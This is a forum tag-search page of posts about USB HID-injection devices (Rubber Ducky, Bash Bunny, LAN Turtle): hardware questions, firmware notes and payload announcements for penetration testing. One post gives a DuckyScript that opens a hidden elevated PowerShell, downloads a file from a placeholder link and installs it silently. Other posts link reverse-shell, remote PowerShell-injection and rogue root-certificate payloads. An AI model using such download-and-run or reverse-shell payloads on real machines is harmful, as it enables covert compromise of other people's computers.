Search the Community
Showing results for tags 'HID'.
Found 24 results
-
In order to provide a PoC that non-administrative access still can result in huge data breaches I present to you The Hidden PP Attack A one liner PoSh command that can be executed from a Teensy/Rubber Ducky which leaves the machine open to injections of PoSh code remotely. Quite happy with this project so I thought id drop it here. Ive lurked remotely without an account for some time without contributing, so... here you are https://simpleinfosec.com/2018/01/09/the-hidden-pp-attack-a-non-administrative-remote-shell-for-data-exfiltration/ https://github.com/secsi/HIDdenPPAttack
-
Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So.. why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has done executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo: Write file (with content) to the desktop Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible Open calculator application Message box -- powered by PowerShell For information about the payload, the payload script itself and how to configure it, it can be found at this GitHub repository: https://github.com/uintdev/RevShellBack
-
Testing the BashBunny for use on a physical pentest/red team engagement but noticing a huge problem with using this device for a real world assessment. Mainly, on a Windows 7 x64 desktop, the initial driver install process took over 2 minutes to install. After initial drivers are installed, my payload initializes and finishes within 10 seconds which is great if only I didn't have to install the drivers first... What makes this issue even worse is that the BashBunny doesn't wait until the drivers have been installed before executing the payload which means you need to unplug/re-plug the device in after waiting 2 minutes to execute the payload. Ideally, it would be nice to build some code into the BashBunny to automatically detect when the drivers are installed and then run the payload. Has anyone had any issues with this and is there any way to improve the speed here? 2 minutes is wayyy to long to wait around at an unlocked workstation. I would be better off typing out the payload by hand if it meant only taking 20-30 seconds max.
-
Hi, There is something i dont understand with the bash bunny... i dont know i feel like its too hard for my brain to understand how it works compared to the Rubber Ducky so i need some help I have this on a rubber ducky its pretty basic and does what i want: Starting an admin powershell Asking for admin and THEN running my command ( download a file output that file and run it quietly ) DELAY 1500 GUI r DELAY 1000 STRING Powershell -WindowStyle Hidden -Command "Start PowerShell -WindowStyle Hidden -Verb RunAs ""& "(New-Object System.Net.WebClient).DownloadFile('LINKHERE', '$env:temp\g.msi'); Start %temp%\g.msi /qn"" ENTER DELAY 1000 ALT o ALT y So How would be the best way to do that without requiring the download because the file will be on the Bash Bunny either inside or on the storage? THE POWERSHELL HAS TO BE ADMIN or the program wont install correctly. i cant get to open an admin powershell and then get the drive letter and execute my program all on one line and ask for approval before actually installing the program ( time saver ) Thanks Alot
-
Is there a way from the Bash Bunny shell to control what the Bash Bunny "does to" the host? For example, if my payload just checks the OS version, connects to a Bash Bunny shell and starts a new script based on that? As one simple example, determining Windows XP (UAC evasion not required) vs Windows 7+ could be useful. Another case might be defaulting to, and then unloading, the ECM_ETHERNET module and replacing it with the RNDIS if we detect that we are on Windows. I realize that the latter case might be better handled using the Switch to change payloads... but doing something like I'm thinking could give me, effectively, more than 2 payloads. If I'm not using the right terminology I apologize... I'm just getting started. I can't find anything by searching but I could be looking for the wrong thing... In the long run some way to control what the Bunny does based on the Host OS would be useful. Thanks!
-
Hi, My problem is that when i tried : ATTACKMODE HID STORAGE DUCKY_LANG ca LED R B QUACK DELAY 1500 LED B QUACK GUI r LED G QUACK DELAY 1000 LED R FAST QUACK STRING Powershell -WindowStyle............insert the magic here QUACK ENTER LED R G B It stays blinking red fast... indefinitely tried a couple things but idk is it related to my language been bad ? because in the languages i do have all the languages...
-
Violation of CoC
-
- 1
-
-
- powershell
- windows
- (and 2 more)
-
Violation of CoC
- 1 reply
-
- 3
-
-
- powershell
- windows
- (and 3 more)
-
I have recently found an article by Samy Kamkar regarding HID exploitation and was wondering which is better. (i understand preference but im more interested in the speed and flexibility aspect of the two as well as ease of deployment) Also, i was wondering if there was a way to turn a teensy into a faux Rubber ducky in regards to making it possible to use the Rubber Ducky coding language on a teensy?
-
Discussion Thread for Root CA installer. (No Local Admin Rights necessary) current development via: https://github.com/jrsmile/bashbunny-payloads/tree/master/payloads/library/rooter (TESTED and Working) pull request waiting. small Howto create self-signed-root-ca: Create the Root Certificate (Done Once) Creating the root certificate is easy and can be done quickly. Once you do these steps, you’ll end up with a root SSL certificate that you’ll install on all of your desktops, and a private key you’ll use to sign the certificates that get installed on your various devices. Create the Root Key The first step is to create the private root key which only takes one step. In the example below, I’m creating a 2048 bit key: openssl genrsa -out rootCA.key 2048 The standard key sizes today are 1024, 2048, and to a much lesser extent, 4096. I go with 2048, which is what most people use now. 4096 is usually overkill (and 4096 key length is 5 times more computationally intensive than 2048), and people are transitioning away from 1024. Important note: Keep this private key very private. This is the basis of all trust for your certificates, and if someone gets a hold of it, they can generate certificates that your browser will accept. You can also create a key that is password protected by adding -des3: openssl genrsa -des3 -out rootCA.key 2048 You’ll be prompted to give a password, and from then on you’ll be challenged password every time you use the key. Of course, if you forget the password, you’ll have to do all of this all over again. The next step is to self-sign this certificate. openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.pem This will start an interactive script which will ask you for various bits of information. Fill it out as you see fit. You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:US State or Province Name (full name) [Some-State]:Oregon Locality Name (eg, city) []:Portland Organization Name (eg, company) [Internet Widgits Pty Ltd]:Overlords Organizational Unit Name (eg, section) []:IT Common Name (eg, YOUR name) []:Data Center Overlords Email Address []:none@none.com Once done, this will create an SSL certificate called rootCA.pem, signed by itself, valid for 1024 days, and it will act as our root certificate. The interesting thing about traditional certificate authorities is that root certificate is also self-signed. But before you can start your own certificate authority, remember the trick is getting those certs in every browser in the entire world.
-
Violation of CoC
- 29 replies
-
- 4
-
-
- powershell
- rdnis
- (and 1 more)
-
So, I'm not sure what to make of this. Maybe it's nothing. My friend was setting up a bunch of dells and noticed this http://www.dell.com/support/home/us/en/04/Drivers/DriversDetails?driverId=5DD13 it looks like just another driver, but HID and BIOS got me wondering. I found this link http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_150812_1 that gives a better description. I couldn't find anything online about what BIOS HID commands there could be. Why would the BIOS need access to HID? If it does have access, what keys does it have, and how do computers interpret them? Could this be exploited? I honestly can't find anything else, but I thought I'd post this in case anyone knows what it actually does and can debunk my curiosity.
-
Violation of CoC
-
Is there a reason why hid attacks dont use copy and past? Like open cmd /open notepad /open txt from usb/ copy/ past to cmd/ ? is there a possibility that AV would detect the malicious code in the clipboard? Thanks -- lost my old account -thedeadhand
-
Hey, folks. I've tried using my LAN Turtle on a few engagements now, and while it's nice to show it plugged into a computer in the report, I rarely get much love out of it, and the shell feels too slow to be useful (guess that's why it's called a LAN Turtle! - It's a really slow shell!) Anyway - The idea that I wanted to float today is whether or not it would be possible to turn the LAN Turtle into a "TwinTurtle", similar to the "TwinDuck" firmware for the USB Rubber Ducky, but in this case, the LANTurtle would continue to be a USB-to-Ethernet adapter as well as acting as a HID device, so you could have a "blind terminal" into the machine it's physically plugged into. This could allow direct exploitation of the machine through powershell meterpreter, for example - The only problem I can think of is how to tell if the device is actually unlocked before sending the commands. So the reason I'm bringing this here is that I don't currently have the know-how to write a custom firmware which implements this sort of functionality, but I wanted to bring up the idea to the community, to see if this is something that is even possible, and if there are people willing and able to implement it.
-
Hello Everybody! I introduce myself, I am new into the forum. I am just going to order my ducky in the few days but I have some questions. 1. The only avaiable ducky model at now is the deluxe one? 2. What is Twin Ducky? A mod for a normal (or deluxe) ducky? 3. Where are the scripts stored, micro SD card? Can I store files into the same micro SD (Twin Ducky is something like that i believe) 5. How is the support for Spanish keyboards? Official? Is it nice? 4. What is ducky encoder? Is it like a firmware for our duckys? Can I update it´s firmware? Thanks in advance everybody! PD: Do you know any HakShop disscount code, don´t you? haha :P
-
Hello everyone, I am Cr0wTom and I recently posted in my channel a video about how to implement rubber ducky scripts in a vulnerable to BadUSB, USB thumb drive. I think that you will appreciate it here. I will be happy to hear your responce, here or in my videos commends. Feel free to subscribe :) Video Link: Thank you for watching!! (More videos to come) -
Hi to all, I am playing with this fantastic gadget and I very like it ! I ordered more than 10 usb and all works great. I am also working on a custom firmware so I had cloned the svn repository for compile the frmwares. Currently I am working on composite_duck firmware: Composite_Duck.zip. In this firmware I have notice a bug..that elaborate only 77-90 instructions. My operations are: --> open a notepad --> write text here. The maximum lenght that I can write into notepad is only 77 character. The character/instructions are hard-coded into the firmware.. trought the array ui_sequence. Into the wiki I read that this firmware could write more than 2048 characters. Anyone have the same problem ? Coulb be a problem becuase I haven't a "delay" ? Many thanks, -
First, let me just say I am completely new to pen testing and such but I am a veteran tech and I want to learn more. I recently got something in the mail that was a promotion for a new TV series. Attached to the side of a fake old 5 1/4 in floppy I noticed a USB edge connector. Printed on the side it read "Insert this into your computer to watch the first full episode now!". I thought for sure that they wouldn't give out a video on a thumb drive so I checked it out. When I plugged it in, it acted a lot like the Rubber Ducky I've seen on Hak5 (a clever bit of marketing I must say). I'm sure that it was coded as a HID because I saw it rapidly open the "Run" box then type a URL to go to it's website and then I assume hit OK or enter to execute it. My question is, can I modify this device to make it more like a Ducky? What tools would I use to explore/modify it's contents? Thanks in advance, I love this forum.
-
NEW Version 2.0 of my USB SwissKnife (Faster, Smaller and concealed, With new USB Ruber Ducky 2.0) Since HAK5 recently lowered its price on the USB Ruber Ducky, I decided it was time to update my old USB SwissKnife! So this one is quite simple; A HAK5 USB Ruber Ducky with the TwinDuck (Composite HID + Mass Storage) firmware with a 8Gb SD card + a 32Gb Bootable USB drive. The Bootable USB Drive is exactly like the old one except that I increased from 16Gb to 32Gb… So the old one still correctly describe that portion. However, the new version of the Ruber Ducky is quite different; - It run on custom hardware instead of using a Teensy. - It has its own scripting language. - It is officially supported by some Penetration Testing software. - Require no programming skill to operate and update payload. - Support Mass Storage from the payload SD card. - Faster and slimmer hardware… So it effectively supersede the older versions, including mine… Now, the question is; can I make it better? Well, the only down side is the speed of the USB Mass Storage which is way too slow to use it as a Bootable USB key, It is still good enough for small Application, Script and Payload so I’ll reserve that storage space for that purpose only, which is still very useful since you can access the payload without removing the SD card. In order to add a Bootable USB Key to the mix, I would need to do the same thing I did on the old version, which is adding a HUB… But this time I realized that I have never used both the HID attack vector and the Bootable USB key at the same time, which kind of make sense since one Inject a payload in a foreign OS, the other Boot an OS on a foreign machine, they are 2 different thing so why not use 2 different key? Well, simply because I want to carry only 1 key! All that to say that this hack simply consist of putting the 2 USB devices in the same plastic package, the real hack is what you put on and do with them! Check OLD Version 1.0 for details about the bootable USB tools...
-
Introducing the latest Composite Firmware - Codename : The Twin Duck The Ducky primarily acts as a USB Mass Storage Device, and on a click of the button will start emulating a Keyboard. Its multi-OS, multi-lingual and comes in three flavours: c_duck_v2.hex - Supports DuckyScript as HID payload, triggered automatically and on GPIO (limited instructions) c_duck_v2_S001.hex - Triggered on CAPS/NUM/SCROLL LOCK c_duck_v2_S002.hex - Triggered on Ducky's GPIO only! Depending on your circumstances, you may want to use either one of these available firmwares. Downloads http://code.google.c.../downloads/list Please test and post feedback here. Snake
-
ok, so i was looking at the the new rubber duckie hid and i was thinking how can I make one or somthing like it. after seeing the video on p2p otg i was thinking that maybe there might be a way to make a app for android to use it as a hid/ruberduckie. if you have any ideas please post. :)
